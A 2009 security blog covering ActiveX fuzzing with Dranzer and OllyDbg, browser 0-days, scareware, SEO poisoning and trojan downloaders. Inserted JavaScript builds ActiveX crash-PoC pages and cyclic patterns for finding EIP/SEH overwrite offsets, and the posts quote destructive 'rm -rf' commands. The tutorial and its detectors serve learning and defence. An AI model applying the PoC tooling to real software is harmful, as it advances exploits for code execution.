Step 3: To see whether the access violation is exploitable we need a debugger, which will allow us to debug the crash in detail and tell us exactly what is being overwritten. Whenever Dranzer detects a crash, it conveniently saves the code that caused the crash in an HTML file in its directory. The file is named {classid}.html and is nothing but the Proof-of-Concept (PoC) for the vulnerability. In my case I have renamed the file evil.html. Since it would be tedious to explain the workings of Olly using screenshots, I decided to make a small flash movie of it. Hopefully, it will be much easier to understand by watching how it's done.

What I am doing here is basically opening IE from within the debugger, which lets us see the state of the registers as IE crashes. As you can see, along with the registers the Structured Exception Handler (SEH) record as well as the instruction pointer (EIP) get overwritten. Those are typical symptoms of a classic stack based buffer overflow. In the video I also showed you how to use the "Call Stack" window in Olly to trace the vulnerable function, which in this case is wcscpy(), the wide-character (Unicode) version of strcpy(). These functions do no bounds checking and are known to cause overflows when used improperly. By adding breakpoints and repeating the same steps you can trace the vulnerable code further.

So, now you have seen how Dranzer can be used to discover flaws in ActiveX components as well as how to use Olly to debug crashes. There are some other options in Dranzer as well, which I will leave to you to explore. In Part 3, I will show how we can use this information and convert the PoC into a real world exploit.

Hope you found this useful. Remember, discovering vulnerabilities needs tremendous amounts of patience. It may not be so easy for you to find a vulnerability every time or even to debug it for that matter, so keep trying !

Happy fuzzing :) !

Tuesday, August 11, 2009

Discovering ActiveX Vulnerabilities -- Part 1 [ Introduction ]

Recently, I discovered a vulnerability in an ActiveX control. Before starting with the discovery, I had absolutely no clue how to discover and exploit vulnerabilities in ActiveX. I learned the hard way, so I finally decided to write a small tutorial that could make life easier for guys like me :) ! In this 3 part series, I will be covering how to use ActiveX fuzzers to find vulnerabilities in COM objects. I won't be covering all the basics in detail, but I will show you how to discover a vulnerability using a fuzzer and then how to code a PoC or exploit for it. This tutorial assumes that you have a basic understanding of how debuggers work and know how to use them.

Ok, let's start with a quick round of basics for those who don't have a clue what I have been talking about so far. So, what's fuzzing ?
"Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted." -- Wikipedia
When you apply that technique to ActiveX or COM objects it's called ActiveX fuzzing. So, what's the big deal you may ask. Well, in some cases these COM objects are exposed through Internet Explorer, so any web page can instantiate them and call their methods. That makes them easy targets for exploitation on the internet. By using a specially crafted web page, an attacker can exploit a vulnerability in an ActiveX control and execute arbitrary code on the victim's machine, as you will see by the end of this tutorial :) !

Basically, I will show you how I discovered the vulnerability, what steps I took to debug it and finally how I came up with the exploit. Unfortunately, I can't disclose too many details about the vulnerability itself as the vendor is still working on a fix. Nevertheless, you can definitely use the same technique on other ActiveX objects to discover new bugs ! In this part, I will cover the basic introduction. In the second part I will show you how to use the tools to discover a vulnerability in an ActiveX control, and in the third part I will show you how to code an exploit for the vulnerability that we have discovered.

For the tutorial, we will be using tools such as OllyDbg, Dranzer, COMRaider and your favorite text editor (mine is Notepad++). So, go get these installed on your system and get yourself familiarized with them. I will not spend time on that here, otherwise this tutorial will become thrice its size :P ! There are a lot of ActiveX fuzzing tools out there but my personal favorites are Dranzer and COMRaider. Again, you could use the debugger of your choice, it's just that I happen to know Olly better. I would also recommend a clean and fresh Windows environment to start with. Fuzzing often tends to use up a lot of resources, so I would suggest using a clean Windows setup with minimum software installed on it. Avoid running an antivirus when fuzzing as it will further slow it down.

Allrighty, to begin with the fuzzing, we first need to know the class identifier of the COM object we are trying to fuzz. Every ActiveX control has a "Classid" or "clsid", a GUID registered in the Windows registry (under HKEY_CLASSES_ROOT\CLSID) that uniquely identifies the control. The "Classid" is embedded in the web page using an "object" tag. Internet Explorer processes the "object" tag in the HTML, checks whether the COM object is installed on the system (and not blocked by a kill bit) and, if so, instantiates it; script on the page can then set its properties and call its methods.

Typically it's the methods inside a particular class that have a vulnerability due to improper coding. So, to see the methods supported by the ActiveX control we will use COMRaider. There are multiple ways of doing this - if you know the classid of the software you are trying to fuzz, you can use it directly in COMRaider, or you can point it at the .ocx/.dll file in the location where the control was installed (like Program Files). Once you have entered the required information you can view the different methods supported by that ActiveX control. COMRaider has an excellent GUI and is a great tool for finding information about the ActiveX control you are trying to use or fuzz.

Fig 1: Example showing ActiveX info in COMRaider

Next, you can right-click any of the methods or functions and choose to fuzz the library or the interface, and start fuzzing - but we will not use COMRaider for this. This is where Dranzer comes into the picture. It's much, much faster than COMRaider when it comes to fuzzing, but it's a command line tool. Note that Dranzer can also give you information about the COM object you are trying to fuzz, but that information is limited. So, I often use a combination of these two tools for fuzzing.
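The PoC page that Part 2 above says Dranzer writes as {classid}.html, built around the "object" tag described in this part, as an added example (my code, not from the posts and not Dranzer's): it generates a cyclic pattern so that the 4 bytes that land in EIP or in the SEH record can be mapped back to an offset in the input, which is the next thing you want after Olly shows you the overwrite. The CLSID, the property name "Caption" and the payload length are placeholders, not the censored control from the posts. Runs under Node.js:

```javascript
// Added example for the Dranzer walkthrough (Part 2) and the <object> tag
// description (Part 1). Not from the original posts and not Dranzer's code.
// The CLSID, the property name "Caption" and the length used below are
// placeholders (assumptions), not the censored control from the posts.

const UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const LOWER = "abcdefghijklmnopqrstuvwxyz";
const DIGITS = "0123456789";

// Non-repeating cyclic pattern (the same idea as Metasploit's pattern_create):
// any 4 consecutive characters occur at exactly one offset, so whatever lands
// in EIP or in the SEH record tells you where in the input it came from.
function cyclicPattern(length) {
  let out = "";
  for (const a of UPPER) {
    for (const b of LOWER) {
      for (const c of DIGITS) {
        out += a + b + c;
        if (out.length >= length) return out.slice(0, length);
      }
    }
  }
  throw new Error("length exceeds the pattern period (20280)");
}

// Convert the 32-bit value OllyDbg shows in EIP or in the SEH chain
// (e.g. "41306241") back into the 4 ASCII bytes that produced it (x86 is
// little-endian) and find their offset in the pattern. Returns -1 if the
// value did not come from the pattern at all.
function patternOffset(hexValue, length) {
  const hex = hexValue.replace(/^0x/i, "");
  if (!/^[0-9a-f]{8}$/i.test(hex)) throw new Error("expected 8 hex digits");
  const bytes = hex.match(/../g).map((h) => parseInt(h, 16)).reverse();
  const chunk = String.fromCharCode(...bytes);
  return cyclicPattern(length).indexOf(chunk);
}

// Build the PoC page. With viaParam=true the value is delivered through a
// <param> tag, which IE hands to the control's IPersistPropertyBag::Load
// (what Dranzer's -p PropertyBag test exercises). Otherwise page script sets
// the property after the control is instantiated (the -t style of test).
function buildPoc({ clsid, property, length, viaParam = false }) {
  const payload = cyclicPattern(length);
  const lines = ["<html><body>"];
  if (viaParam) {
    lines.push(
      `<object id="target" classid="clsid:${clsid}">`,
      `  <param name="${property}" value="${payload}">`,
      "</object>"
    );
  } else {
    lines.push(
      `<object id="target" classid="clsid:${clsid}"></object>`,
      "<script>",
      `  var payload = "${payload}";`,
      `  target.${property} = payload;`,
      "</script>"
    );
  }
  lines.push("</body></html>");
  return lines.join("\n");
}
```

Write the string returned by buildPoc() to evil.html, open it in IE under Olly as in the video, and when it crashes feed the hex value shown in EIP (or in the SEH record) to patternOffset() with the same length: the result is the byte offset in your input at which that value was taken from, which is what you need to place something of your own there in Part 3. Keep the length below the pattern period, otherwise offsets stop being unique.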

So, that's it folks for now. I will see you again in Part 2, where I will cover Dranzer in detail as well as using Olly to debug IE crashes.

ActiveX -- Introduction to using ActiveX on the web
OllyDbg -- The Olly debugger for debugging and disassembly.
Dranzer -- The Dranzer ActiveX Fuzzer
COMRaider -- COMRaider ActiveX Fuzzer

Wednesday, July 15, 2009

It's raining 0day's...

Whew.. ! The last 10 days have been quite busy for security folks like me. There have been three 0days discovered recently. It all started with the DirectX ActiveX vulnerability which I blogged about previously. Then, a Microsoft Office Web Components ActiveX vulnerability was observed being exploited in the wild. The list of domains hosting the Microsoft exploit is published and maintained at SANS, so in case you are not too sure of a URL or domain, you can look it up there.

And today it's the 0day in the latest Mozilla Firefox browser (3.5) ! Wow.. that's just too many goodies for the bad guys to pwn you with :) ! Though there are no known cases of this vulnerability being exploited in the wild yet, it's just a matter of time. It's a standard heap-spraying kind of exploit, but a little hard to make reliable. I doubt it will be that popular with the bad guys, mainly for two reasons - firstly, the code execution works only on WinXP SP2 - it just crashes the browser on SP3 - and secondly, Firefox 3.5 has only just been released, so I am not sure how much of an audience there will be for the bad guys. A patch for this is in progress but has not been released yet, so the only workaround right now is to disable the JIT in the JavaScript engine. Refer to the advisory here for more details on how to do that.

As if this wasn't enough, the anti-sec fellows are all over the Full-Disclosure mailing list and apparently claim they have 0days for SSH and the Apache web server. Now, a lot of people think these are all rumors since very little evidence has been posted regarding the SSH exploit. But they have already hacked into some websites like ImageShack and Astalavista to prove their point, so you never know ! These so called anti-sec fellows are now targeting Milw0rm, among others, and are openly threatening to shut it down. While I am not completely against their philosophy of vulnerability disclosure, hacking into somebody's box and executing "rm -rf /" is absolutely not the way to tackle this issue !

So, my dear friends, it's never too late to patch and upgrade your systems. Firefox is an amazing browser but that doesn't mean it won't be targeted.

Update1: The Mozilla vulnerability is fixed in 3.5.1, so it's time to upgrade your browser !

Update2: There is an Adobe Flash 0day on the loose again ! .. At the rate these 0days are coming these days, it looks like we will have to coin a new term for it ! :P .. Anyways, the exploit is delivered via a PDF file with a malicious Flash file embedded in it - talk about new attack vectors ! Very little information is available regarding the exact vulnerability and SEO has already started doing its damage, so please be careful with what PDFs you are viewing. Will keep you posted as the mystery unfolds..

Tuesday, July 7, 2009

Microsoft IE 0day ...Not again !?

Sad, but true. Once again MS Internet Explorer users have to run around hiding from the MPEG2 ActiveX exploit that is lurking around, exploiting this new vulnerability in "msvidctl.dll". And there is still no patch available for this critical vulnerability. I think, looking at the licensing costs, Micro$oft products should come with some sort of SLA when we buy them, like fixing a critical vulnerability within a day or something like that. I mean, it's ridiculous that it's been more than 48 hrs that the exploit for this vulnerability has been actively hosted on literally thousands of websites and we still don't have a patch for it !

Anyways, the vulnerability is pretty interesting in itself. I mean, it's not the standard ActiveX kind of vulnerability where you just overflow some parameter inside a function to pwn the SEH. The exploit requires some kind of GIF file to successfully execute shellcode. Well, not a GIF file as such, but a specially crafted image file - the extension could be anything. This, together with the ActiveX control, causes the overflow and the SEH overwrite. In fact, the SEH is overwritten by the contents of the image file.

Currently, there are websites hosting this malicious HTML page. Innocent users are lured into browsing these websites by some link sent in a mail, via XSS, or through social networking sites. Once the user lands on the malicious website, the shellcode within the exploit runs a downloader on the user's machine. This further opens up the machine to a host of different malware infections. The exploit has been partially published on the internet, so it won't be long before we start seeing another flurry of malware distribution using this technique.

So, as we wait for our dear Mr.Gates to release a fix for this, I suggest you keep away from those silly mails that ask you to click on some weird link, and from links you receive on social networking sites like Facebook/Orkut/Twitter. Nowadays these social networking sites are gaining so much popularity that attackers have started targeting them first. Also, as a workaround I would suggest setting the kill bit for this ActiveX control (which prevents the vulnerable control from being loaded inside the browser). You can find more information on that in the Microsoft knowledge base.

As for the Microsoft advisory (whats the point of having one if there is no solution !) you can read it here.

Be careful and browse safe !

Wednesday, July 1, 2009

Bad news for some.. good for others..

It's said that bad news travels fast ! And no doubt it does, but generally it's the bad guys who catch it first. Whether it is Michael Jackson's death, the swine flu pandemic or the Air France crash, malware authors don't spare anything they can use as bait. The moment such news is out, the bad guys register fake domain names and, using SEO (Search Engine Optimization) attacks, make sure their malicious links are out there.

This time it was the rumors surrounding MJ's death that, apart from DoS'ing Facebook and Twitter, had malware authors going into a frenzy to capitalize on the sheer volume of searches. One such fake site was soon distributing malware called "" to visitors who browsed it. Others claimed they had a video showing Michael's last moments in life and redirected users to a link that looked like a YouTube page (Fig 1). It then used the old trick of prompting users to install a fake codec (malware) in order to view the video.

[ Fig 1 - Fake youtube website showing MJ's last moments ]

It's a known fact that malware authors run scripts that keep track of sites such as Google Trends, and as soon as they see a surge in hits on a particular topic, they register a new domain and start distributing malware using SEO. Now that's some clever scripting !

So folks, be careful and extra cautious when you start searching for the latest ground breaking news on the internet. Do not install any kind of executable, ActiveX or Flash component for your browser if you are not sure about the source. It's better to visit some other link than to take the risk of installing anything on your machine. Some tools (obviously free !) that I would like to recommend are a couple of browser plug-ins for Mozilla Firefox. This is what I use and it really helps sometimes -
  • WOT or Web of Trust plug-in: This Firefox plug-in preemptively warns you by displaying a small colored circle next to each link on a page, rating the link as good or bad.
  • FlagFox: This neat plug-in shows a small flag of the country in which the website you are browsing is hosted. So next time you get redirected to a Russian or Korean domain you know what to do :)
Apart from that, sometimes Firefox or Google search itself will show a banner informing you that the site has been blocked or is not safe for viewing. Now, I am not advocating any of these plug-ins, and neither will I say that they guarantee 100% protection against malware, but hey, something is better than nothing ;) !

So here's wishing you a safe & happy browsing.. :) !

Tuesday, June 23, 2009

A new breed of attacks

At the beginning of 2009, there was a sudden increase in a new form of malware being distributed. The bad guys are getting smarter by the day, giving rise to a new breed of attacks. All these attacks have one thing in common though - they exploit the victim's fear of malware !

Almost every month there is a new variant of these so called security or antivirus programs. These fake security programs pretend to scan your system and claim that the machine is infected with lots of malware, when in fact there is none ! Some of the screens shown are so convincing that anyone not running an antivirus will easily fall for it.

[ Fig 1 - Fake Antivirus Programs ]

They all boast the WinXP/Vista look and feel. While some of them will trick you into downloading more malware, others will try to scare you into spending $30-80 to buy fake protection. They even offer Visa, MasterCard and PayPal payment options so that victims can pay.

Ransomware takes fake security programs to the next level. Now, apart from those irritating screens that claim the machine is infected, the malware locks and prevents other programs from running, including Task Manager, Command Prompt and other system and office applications. There are even variants that encrypt all the office files stored on the system. Now the user is forced into paying to use his own machine :o !

[ Fig 2 - Ransomware encrypting office files ]

[ Fig 3 - SMS Ransomware ]

But who said ransomware was limited to forcing the user to buy fake programs ?! Welcome SMS ransomware :) .. While some of this family of malware lock the desktop, others take control of the mouse pointer, preventing you from clicking anywhere (how irritating :/ !) except in a window that asks for a code to be entered. The victim is then prompted to send a premium-rate SMS to a specified number to receive the unlock code.

SEO (Search Engine Optimization) Attacks
This attack exploits the way search engines work. The bad guys create web pages and fill them with words and phrases that are popular search queries, such as "Air France crash", "American Idol winner" or "Conficker" for that matter. Next they compromise a popular, legitimate website (for example through a cross-site scripting flaw) and insert a small piece of JavaScript that redirects the browser to their web page. This is added to as many pages of the compromised high-traffic site as they can manage. This is where the SEO kicks in: the search engine ranks pages and prioritizes results based on relevance, so along with the results for popular websites, the bad guys' page also turns up. Anyone who clicks on the bad link ends up with malware !
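A check for the injected redirect described above, as an added example (my code, not from the post): given a page's HTML and the site's own host, it lists every script or meta redirect that points off-site. The sample page is constructed; the referrer check in it is an assumption about how such injections typically hide from the site's own visitors, not something the post states. Runs under Node.js:

```javascript
// Added example, not from the original post. Flags the kind of small injected
// redirect described above when you pull a page's HTML (for instance from a
// crawl of a site you administer). The sample page and its hosts are constructed.

const REDIRECT_PATTERNS = [
  // window.location = "..."; document.location.href = "..."; top.location = "..."
  /(?:(?:window|document|top|self|parent)\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/gi,
  // location.replace("...") / location.assign("...")
  /location\.(?:replace|assign)\(\s*["']([^"']+)["']\s*\)/gi,
  // <meta http-equiv="refresh" content="0;url=...">
  /<meta[^>]+http-equiv=["']refresh["'][^>]*url=([^"'\s>]+)/gi,
];

// Hostname of an absolute URL, or null for a relative URL (which stays on-site).
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Every redirect target in the HTML whose host is not the site's own host.
function findExternalRedirects(html, siteHost) {
  const own = siteHost.toLowerCase();
  const hits = [];
  for (const re of REDIRECT_PATTERNS) {
    re.lastIndex = 0; // the patterns are global; reset between documents
    let m;
    while ((m = re.exec(html)) !== null) {
      const host = hostOf(m[1]);
      if (host !== null && host !== own) {
        hits.push({ target: m[1], host, snippet: m[0].trim() });
      }
    }
  }
  return hits;
}

// Constructed sample: a legitimate page (with its own harmless on-site meta
// refresh) carrying one injected redirect that only fires for search traffic.
const SAMPLE_PAGE = `<html><head>
<meta http-equiv="refresh" content="300;url=/news/index.html">
</head><body>
<h1>Local news</h1>
<script>
if (document.referrer.indexOf("google") != -1) {
  window.location = "http://example.net/in.php?q=red";
}
</script>
</body></html>`;

function demo() {
  return findExternalRedirects(SAMPLE_PAGE, "example.com");
}
```

Because these injections are often gated on the Referer (as in the sample), fetch each page twice when checking a site, once with a search-engine Referer header and once without, and run the check on both copies; a redirect that appears only in the first copy is the clearest sign of a poisoned page.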

You might think all this dirty work is some script kiddie sitting somewhere in Russia wanting to earn a few quick bucks. But that's not all there is to this story - there are whole underground syndicates running these operations !! There is an excellent article posted by Byron Acohido on his blog about how the bad guys are making a profit out of this whole fake programs thing ! Now that's some real scareware ;)

Friday, June 12, 2009

100,000 websites wiped off !

In what appears to be a zero-day exploit in the HyperVM virtualization software, the attacker managed to wipe out the data of 100,000 websites hosted by a company called Vaserv. This software was developed by a company called LxLabs, based out of Bangalore. HyperVM is a popular piece of software used by many hosting companies.

Vaserv suspects that the attacker was able to gain "root" access by exploiting the 0-day vulnerability and then deleted files from the system. On the contrary, an anonymous post somewhere suggests it was something else. The post contains all the gory details of how the attackers went about screwing up the systems. I can't believe there are sadistic people in this world who enjoy issuing commands like "rm -rf *". The extent of the damage is still not completely known and it seems the billing systems were also 0wned ! Apparently, details of the vulnerability were known to LxLabs 2 weeks before this incident took place.

The worst part is that 50% of the customers hosted on the compromised provider didn't have backups (since they had subscribed to an unmanaged service), so god knows if they will ever get the data back ! A lesson to be learned here for everyone - "If it's your data, back it up!" You can't rely on others to do it for you. This is about the worst kind of attack anyone can get, and it just shows how critical it is to secure the infrastructure, especially for big hosting providers.

As if this was not enough, the founder of LxLabs committed suicide the day after Vaserv reported this incident. Now people all over seem to be linking these two things together, but I doubt that's the case. Anyways, may his soul rest in peace!


Thursday, June 11, 2009

XM Personal FTP Server vulnerability

Recently I discovered a Denial-of-Service vulnerability in XM Personal FTP Server 5.7. This is an easy to use FTP server application which lets you set up an FTP server really fast without any complex configuration.

This vulnerability was actually discovered in May. Despite trying multiple times to contact the author of this software, he did not respond to my communication. So eventually I decided to post the details of the vulnerability as well as the PoC on Bugtraq.

The vulnerability exists because the application fails to handle arguments passed to some of the standard FTP commands such as HELP and TYPE. It was actually discovered accidentally when I was trying to figure out how to use fuzzing tools ! :) ... The tool I used was FTP Fuzzer 1.0 from Infigo, which is a nice tool for fuzzing. This is just a DoS vulnerability and remote code execution is not possible. For some strange reason SecurityFocus has stated that remote code execution is possible, but I don't think so.

Sometime I will write an article on fuzzing. It's a pretty interesting concept and in fact I am also writing a protocol fuzzer. Hopefully it will be done soon !

Details of the vulnerability available at -

Friday, June 5, 2009

The long and short of it..

Do you get frustrated sending huge links to people only to find out that they don't work because they got cut due to text wrapping :( ? Well, URL "shorteners" are the thing you should be looking for. These websites make the URL small so that you have a short, customized URL and don't have to send the whole long thing to your friends. So, services like "", "" and "" are very popular with social networking sites such as Twitter, where there is a limit on the number of characters you can post. The best part is - it's free !

So what's the big deal, you may say. The thing is that URL shortening services work by redirection, and this conceals the URL of the actual website you are landing on. So, someone could send you a link that says "" and actually send you to "". Security is a big concern here: before you know it, you may be redirected to a website that hosts a browser exploit to download malware onto your system.

Moreover, reliability is also an issue. For the link to work, both the destination web server and the redirector now have to be up and running. With these services being given out for free, I can imagine the kind of load these servers must be receiving. The CEO claims they receive 100 million hits per week** !!! :o

Solution ? - "For every new invention, there is an equal and opposite invention".. welcome "". It will expand and show you every short URL you type in - smart eh ?! ;) So, next time you receive such a shortened link, use this website and be sure that you are being redirected to the correct website.

** Ref:

Tuesday, June 2, 2009

You've g0t Ma1L

Recently I received a funny mail about some missing parcel from "United Parcel Service of America" ! At first, it seemed to be a very legitimate mail and didn't appear to be obvious spam. But unfortunately for the sender, I knew that I had not ordered any parcel, so my hacker senses were soon tingling :) ..

[ Fig 1 - Mail about some parcel not being delivered ]

A closer look at the mail reveals some interesting things about the spammer. Firstly, there are no obvious spam symptoms and the sender also looks legit. The body is also well structured, making it look authentic. So, I went ahead (knowing I had Symantec AV installed and updated) and extracted the contents of the attachment to a folder. To my surprise, it extracted without any warnings.

As a person who eats malware for breakfast and lunch, I have one good habit: un-checking the "Hide extensions for known file types" option in Windows Explorer (Tools >> Folder Options >> View) on all systems that I work with. Somehow I never understood why this option is there in the first place, and that too checked by default on WinXP installations. Anyways, to make matters worse, Windows Explorer conveniently truncates the displayed name (since it's a long name), making it look like a nice Excel file to open. By now, I am sure any innocent user would have fallen prey to the sender and executed this file.

After selecting the file, the full name shows up - "UPS_DOC_986001.exe". Gotcha ! Now, since when did invoice copies start getting distributed as executables ?! A quick VirusTotal scan identifies the trojan as Win32/Bredolab [Symantec]. Even as I uploaded the file to VirusTotal, my Symantec AV didn't raise any alarms, which is a bit unusual since it's usually the first to jump on any file I attempt to view. Bredolab is a downloader type of trojan which was discovered recently. Some of the variants of this type of postal mail are known to download fake AV programs and other malicious files.

This method of distributing malware is not new. Older versions referring to "Western Union" instead of UPS have been circulating for some time now, indicating that this mail could be from the same malware authors. So, be careful with attachments when you receive mails from unexpected or unknown sources, and don't forget to change the Windows Explorer file extension setting!

Monday, June 1, 2009

Dawn of the Downl0ad3rs

So what are trojan downloaders ?? In short, "malware that is designed to download more malware" (duh !?). Actually, over the years these downloaders have evolved a lot and today they represent a major chunk of the malware family.

So, what is the sole purpose of these so called trojan downloaders - "to download more nasty stuff onto the affected machine" (duh again !?) Yes.. but much more than that. They are designed to be lightweight and stealthy, to evade intrusion prevention devices and, more importantly, to give the attacker full control over what gets downloaded and when !!

Typically, as soon as a downloader is executed on a system, it contacts a website (generally a hard coded domain name) and waits for the response. But unlike a normal web server's response, what actually comes back is a list of URLs to download more bad stuff from -
[ Fig 1 - Typical Trojan downloader webserver response ]

So, now the attacker who owns the server can control what gets downloaded onto the affected system. He can change the files or links whenever he wants to. All the downloader has to do is fetch every file listed in the response and execute it. But that's not all - how about some obfuscation to trick our good ol' Intrusion Detection/Prevention devices (IDS/IPS) !?

[ Fig 2 - Encoded or obfuscated response ]

What may look like a bunch of garbage characters is actually hex encoded or otherwise obfuscated data, there to keep the good guys at bay. The web server in this case gets even more sophisticated, scripting other activities for the downloader trojan running on the affected machine!

[ Fig 3 - Using image name for downloading ]

Another trick is to use image names for downloading malware. At first it appears to be a harmless image download, but it is actually an executable file ! Wireshark is smart enough to detect that it's not an image (it looks at the content, not the name), but can your IDS/IPS do it ?!
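The three tricks above (a URL list as the C2 response, an obfuscated encoding of it, and an executable served under an image name) in one added example (my code, not from the post): it decodes the list and then does what Wireshark does, judging each fetched body by its first bytes rather than by its name. The hex encoding of the URL list is an assumption for illustration (real families use their own schemes) and all sample URLs and bodies are constructed. Runs under Node.js:

```javascript
// Added example, not from the original post. Models the downloader traffic in
// Figs 1-3: decode an obfuscated URL list (the hex encoding is an assumption
// for illustration; real families use their own schemes) and check each
// fetched body against the type its URL name claims, which is what an
// IDS/IPS must do to catch an .exe served under an image name.
// All sample data below is constructed.

function decodeHexUrlList(body) {
  const clean = body.replace(/\s+/g, "");
  if (clean.length % 2 !== 0 || /[^0-9a-f]/i.test(clean)) {
    throw new Error("response is not a hex string");
  }
  const text = Buffer.from(clean, "hex").toString("latin1");
  return text
    .split(/\r?\n/)
    .map((s) => s.trim())
    .filter((s) => /^https?:\/\//i.test(s));
}

// File signatures (magic bytes) for the types that matter here.
const MAGIC = [
  { type: "exe", bytes: [0x4d, 0x5a] },             // "MZ": PE/DOS executable
  { type: "pdf", bytes: [0x25, 0x50, 0x44, 0x46] }, // "%PDF"
  { type: "swf", bytes: [0x46, 0x57, 0x53] },       // "FWS": uncompressed Flash
  { type: "swf", bytes: [0x43, 0x57, 0x53] },       // "CWS": zlib-compressed Flash
  { type: "gif", bytes: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
  { type: "jpg", bytes: [0xff, 0xd8, 0xff] },
  { type: "png", bytes: [0x89, 0x50, 0x4e, 0x47] },
];
const IMAGE_TYPES = new Set(["gif", "jpg", "jpeg", "png"]);
const EXEC_EXTS = new Set(["exe", "dll", "scr", "ocx", "cpl"]);

// Type of a body judged by its leading bytes, "unknown" if no signature matches.
function sniffType(buf) {
  for (const m of MAGIC) {
    if (buf.length >= m.bytes.length && m.bytes.every((b, i) => buf[i] === b)) {
      return m.type;
    }
  }
  return "unknown";
}

// Compare what the URL's extension claims with what the bytes say.
function checkBody(url, buf) {
  const path = new URL(url).pathname;
  const ext = path.includes(".") ? path.split(".").pop().toLowerCase() : "";
  const actual = sniffType(buf);
  const claimsImage = IMAGE_TYPES.has(ext);
  const suspicious =
    (claimsImage && actual !== "unknown" && !IMAGE_TYPES.has(actual)) ||
    (actual === "exe" && !EXEC_EXTS.has(ext));
  return { url, ext, actual, suspicious };
}

// The whole check over one decoded response, given the bodies that were fetched.
function analyzeResponse(hexBody, bodiesByUrl) {
  return decodeHexUrlList(hexBody).map((u) =>
    checkBody(u, bodiesByUrl[u] || Buffer.alloc(0))
  );
}

// Constructed sample: what the C2 sent (hex of a URL list) and the first bytes
// of what each URL returned.
const SAMPLE_URLS = [
  "http://example.net/img/banner.jpg",
  "http://example.net/files/update.exe",
  "http://example.net/img/logo.gif",
];
const SAMPLE_RESPONSE = Buffer.from(SAMPLE_URLS.join("\n"), "latin1").toString("hex");
const SAMPLE_BODIES = {
  [SAMPLE_URLS[0]]: Buffer.from("MZ\x90\x00\x03\x00\x00\x00", "latin1"), // exe behind a .jpg name
  [SAMPLE_URLS[1]]: Buffer.from("MZ\x90\x00\x03\x00\x00\x00", "latin1"), // exe, honestly named
  [SAMPLE_URLS[2]]: Buffer.from("GIF89a", "latin1"),                     // real image
};

function demo() {
  return analyzeResponse(SAMPLE_RESPONSE, SAMPLE_BODIES);
}
```

On the sample, only the first URL is flagged: its name says .jpg but the body starts with "MZ". The honestly named .exe is not flagged by this check (a content/name mismatch rule is not an "is this malware" rule), which is exactly why the image-name trick exists: it is the mismatch, not the download itself, that a name-based filter misses.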

Ultimately a whole bunch of crap - from worms/trojans to fake AV programs to malicious .pdf and .swf files - can get downloaded onto your system. So, be careful and keep your AV updated; you never know what a small exe could do to your system !


.. to the Hypersecurity Blog. This blog is about my research in the field of Network and Computer Security. So hop on and I will show you how deep the rabbit hole goes in Alice's computer'land.. :)